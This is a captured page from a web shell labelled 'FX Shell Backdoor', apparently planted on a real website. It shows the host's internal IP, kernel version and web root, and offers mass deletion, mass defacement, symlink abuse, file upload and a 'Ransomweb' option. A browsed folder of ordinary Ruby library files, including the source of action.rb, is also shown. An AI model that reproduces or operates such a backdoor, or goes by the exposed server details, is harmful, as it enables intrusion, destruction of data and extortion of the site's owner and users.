FX Shell Backdoor
Home
Tools
Mass Delete
Mass Deface
Symlink
About
Website : vivehg.com
Ip Address : 172.31.2.149
Port : 443
Kernel : Linux 52-72-122-155.cprapid.com 5.15.0-1084-aws #91~20.04.1-Ubuntu SMP Fri May 2 06:59:36 UTC 2025 x86_64
Protokol : HTTP/1.1
Save Data :
Koneksi :
Server : Apache
Root : /home/vivehg/public_html
G-Interface : CGI/1.1
R-Method : GET
Browser : Lainnya
Version Shell : 1.0 (Release candidate)
Author : FierzaXploit/Mr.MF33
Type
Name
options
PATH :
/
lib
/
ruby
/
vendor_ruby
/
molinillo
/
dependency_graph
/
Upload
Buat File
Buat Folder
Buat Ransomweb
# frozen_string_literal: true module Molinillo class DependencyGraph # An action that modifies a {DependencyGraph} that is reversible. # @abstract class Action # rubocop:disable Lint/UnusedMethodArgument # @return [Symbol] The name of the action. def self.action_name raise 'Abstract' end # Performs the action on the given graph. # @param [DependencyGraph] graph the graph to perform the action on. # @return [Void] def up(graph) raise 'Abstract' end # Reverses the action on the given graph. # @param [DependencyGraph] graph the graph to reverse the action on. # @return [Void] def down(graph) raise 'Abstract' end # @return [Action,Nil] The previous action attr_accessor :previous # @return [Action,Nil] The next action attr_accessor :next end end end
action.rb
Choose...
Edit
Rename
Delete
Now
add_edge_no_circular.rb
Choose...
Edit
Rename
Delete
Now
add_vertex.rb
Choose...
Edit
Rename
Delete
Now
delete_edge.rb
Choose...
Edit
Rename
Delete
Now
detach_vertex_named.rb
Choose...
Edit
Rename
Delete
Now
log.rb
Choose...
Edit
Rename
Delete
Now
set_payload.rb
Choose...
Edit
Rename
Delete
Now
tag.rb
Choose...
Edit
Rename
Delete
Now
vertex.rb
Choose...
Edit
Rename
Delete
Now